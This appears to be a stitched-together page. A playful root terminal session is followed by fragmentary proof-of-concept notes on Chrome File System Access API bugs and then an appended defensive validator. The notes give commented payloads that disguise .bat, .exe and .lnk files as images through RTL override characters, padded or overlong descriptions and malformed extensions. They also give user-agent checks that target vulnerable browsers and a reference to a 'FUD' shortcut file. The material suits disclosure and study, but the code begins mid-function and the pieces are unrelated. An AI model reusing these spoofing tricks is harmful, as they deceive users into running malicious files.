[email protected]:/home$ sudo -s
[sudo] password for intadd:

[email protected]:/home# python3
Python 3.6.9 (default, Apr 18 2020, 01:56:04)
[GCC 8.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import requests
>>> res = requests.get("http://InPeaceForLife.how", headers={'name': 'intadd', 'birth': '971219'})
>>> res
<Response [200]>
>>> res.text
'We have to love each other.'
>>> f = open("/var/log/intadd/20200706_notepad.log", 'a')
>>> f.write(res.text)
27
>>> f.close()
>>> exit()
[email protected]:/home# ls
Contact   Blog    WhoAmI
[email protected]:/home# exit
exit
[email protected]:/home$ id
uid=1000(intadd) gid=1001(KIA) groups=1001(KIA)
[email protected]:/home$
File System Access API - security bugs

    const writable = await handle.createWritable()
    // 1) download file from local/server (Good for exe/lnk)
    // you need to have FUD file lnkextra.lnk on server/local
    // can be changed to a different file like cat.jpg
    // const response = await fetch('lnkextra.lnk');
    // await response.body.pipeTo(writable);
    // 2) write text to the downloaded file (Good for bat)
    // instead of downloading a file we can write text to the file
    await writable.write('C:\\Windows\\system32\\calc.exe')
    await writable.close()
})

// Other examples: you need to swap the "types" section :)

// Lots of whitespace and fake extensions in the description
// before patch: Save as type: "JPEG Image (*.jpg)" - description too long, real extension was hidden
// after patch: Save as type: "JPEG Image (.jpg)" - limits on description length
//
// types: [
//   {
//     description: "JPEG Image (*.jpeg) \n\n\t\t\t\t\t\t\n\n\n ",
//     accept: {
//       "text/plain": [".bat"]
//     }
//   }
// ]

// RTL in description
// before patch: Manipulation with RTL character
// after patch: RTL character is still working but we can't manipulate it to delete the extension
//
// types: [
//   {
//     description: "Foo \u202egepj\u202e.moc.segami.www.exe Ardd",
//     accept: {
//       "text/plain": [".bat"]
//     }
//   }
// ]

// Super long description
// before patch: Description is too long so real extensions are hidden
// after patch: limits on description length
//
// types: [
//   {
//     description: "JPEG Image (*.jpeg) this is super safe image, because it is a cat, and cats are cool there is nothing to worry about this must do exactly what you think it does, so you can download it and be happy",
//     accept: {
//       "text/plain": [".bat"]
//     }
//   }
// ]

// Many spaces in the extension
// before patch: Extra manipulation of file name by extension field
// after patch: extension field has limited length
//
// types: [
//   {
//     description: "JPEG Image",
//     accept: {
//       "text/plain": [
//         ".jpg .bat"
//       ]
//     }
//   }
// ]

// RTL in extension
// before patch: Manipulation with RTL character
// after patch: RTL character is blocked
//
// types: [
//   {
//     description: "JPEG Image (*.jpeg)",
//     accept: {
//       "text/plain": [".\u202egepj\u202e.moc.segami.www.exe"]
//     }
//   }
// ]

// Extension ends with space (source: https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file)
// before patch: File is downloaded and hard to delete on windows (Possible that it wasn't always working)
// after patch: Extension cannot have space at the end
//
// types: [
//   {
//     description: "JPEG Image",
//     accept: {
//       "text/plain": [".jpeg "]
//     }
//   }
// ]

// Extension ends with period (source: https://docs.microsoft.com/en-us/windows/win32/fileio/naming-a-file)
// before patch: File is downloaded and hard to delete on windows (Possible that it wasn't always working) - not sure
// after patch: Extension cannot end with a period
//
// types: [
//   {
//     description: "JPEG Image",
//     accept: {
//       "text/plain": [".jpeg."]
//     }
//   }
// ]

// lnk file
// before patch: possible to download LNK - windows shortcut file
// after patch: LNK files are blocked
//
// types: [
//   {
//     description: "JPEG Image (*.jpg)",
//     accept: {
//       "application/x-ms-shortcut": []
//     }
//   }
// ]

// EXTRA - Because everything happens in JS we can check if the user's browser is vulnerable
// var userAgentA = navigator.userAgent;
// var description = 'JPEG (*.jpeg)'
// var extension = '.jpeg'
// var file = "someRealPhotoFile.jpeg"
// Exploit works on this client - windows 10 - change to dangerous .exe file
// if (userAgentA.includes("Windows NT 10.0") && userAgentA.includes("Chrome/86.0.4240.75")) {
//   var extension = '.exe'
//   var file = "putty.exe"
// }
// Exploit works on this client - windows 7 - change to dangerous .src (screen saver) files (windows 10 stopped running .src files due to a security issue)
// But .src looks more legit than .exe - so it is better
// else if (userAgentA.includes("Windows NT 6.1") && userAgentA.includes("Chrome/86.0.4240.75")) {
//   var extension = '.src'
//   var file = "putty.exe"
// }
//
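The post-patch rules listed in the notes above (description length limit, limited extension field, no bidi override in the extension, no trailing space or period, LNK blocked) can be expressed as a defensive pre-check that a web app runs over its own `showSaveFilePicker()` `types` array before handing it to the browser. This is an added example, not code from the original notes; the numeric caps, the blocked-MIME set and the `validateTypes`/`checkExtension` names are assumptions chosen for illustration, not Chromium's actual values.

```javascript
// Added example (not from the original notes): apply the post-patch rules to a
// showSaveFilePicker() "types" array and report why each entry would be rejected.
// Caps and blocked lists below are assumptions for illustration, not Chromium's values.
const MAX_DESCRIPTION_LENGTH = 64;                       // assumed cap on description length
const MAX_EXTENSION_LENGTH = 16;                         // assumed cap on the extension field
const BLOCKED_EXTENSIONS = new Set(['.lnk']);            // LNK is blocked after the patch
const BLOCKED_MIME_TYPES = new Set(['application/x-ms-shortcut']);
// Bidi controls (U+202E RIGHT-TO-LEFT OVERRIDE and friends) used in the RTL tricks above.
const BIDI_CONTROL = /[\u200E\u200F\u202A-\u202E\u2066-\u2069]/;
// Returns the reasons an accept-extension is unsafe; an empty list means it passes.
function checkExtension(ext) {
  const reasons = [];
  if (!ext.startsWith('.')) reasons.push('extension must start with "."');
  if (ext.length > MAX_EXTENSION_LENGTH) reasons.push('extension too long');
  if (/\s/.test(ext)) reasons.push('extension contains whitespace');
  if (/[. ]$/.test(ext)) reasons.push('extension ends with a period or space');
  if (BIDI_CONTROL.test(ext)) reasons.push('extension contains a bidi control character');
  if (BLOCKED_EXTENSIONS.has(ext.toLowerCase())) reasons.push('extension is blocked');
  return reasons;
}
// Returns [{ index, reasons }] for failing entries; stricter than the browser in that
// it also flags bidi controls and padding inside the description itself.
function validateTypes(types) {
  const rejected = [];
  types.forEach((type, index) => {
    const reasons = [];
    const desc = type.description || '';
    if (desc.length > MAX_DESCRIPTION_LENGTH) reasons.push('description too long');
    if (/[\r\n\t]|\s{2,}/.test(desc)) reasons.push('description contains line breaks, tabs or padding');
    if (BIDI_CONTROL.test(desc)) reasons.push('description contains a bidi control character');
    for (const [mime, exts] of Object.entries(type.accept || {})) {
      if (BLOCKED_MIME_TYPES.has(mime)) reasons.push(`blocked MIME type ${mime}`);
      for (const ext of exts) reasons.push(...checkExtension(ext).map((r) => `${ext}: ${r}`));
    }
    if (reasons.length) rejected.push({ index, reasons });
  });
  return rejected;
}
// Constructed sample: a benign entry first, then the spoofing cases from the notes above.
const SAMPLE_TYPES = [
  { description: 'JPEG Image (*.jpeg)', accept: { 'image/jpeg': ['.jpg', '.jpeg'] } },
  { description: 'JPEG Image (*.jpeg) \n\n\t\t\t\t\t\t\n\n\n ', accept: { 'text/plain': ['.bat'] } },
  { description: 'Foo \u202egepj\u202e.moc.segami.www.exe Ardd', accept: { 'text/plain': ['.bat'] } },
  { description: 'JPEG Image', accept: { 'text/plain': ['.jpg        .bat'] } },
  { description: 'JPEG Image (*.jpeg)', accept: { 'text/plain': ['.\u202egepj\u202e.moc.segami.www.exe'] } },
  { description: 'JPEG Image', accept: { 'text/plain': ['.jpeg '] } },
  { description: 'JPEG Image', accept: { 'text/plain': ['.jpeg.'] } },
  { description: 'JPEG Image (*.jpg)', accept: { 'application/x-ms-shortcut': [] } },
];
console.log(validateTypes(SAMPLE_TYPES)); // every entry except index 0 is reported with its reasons
```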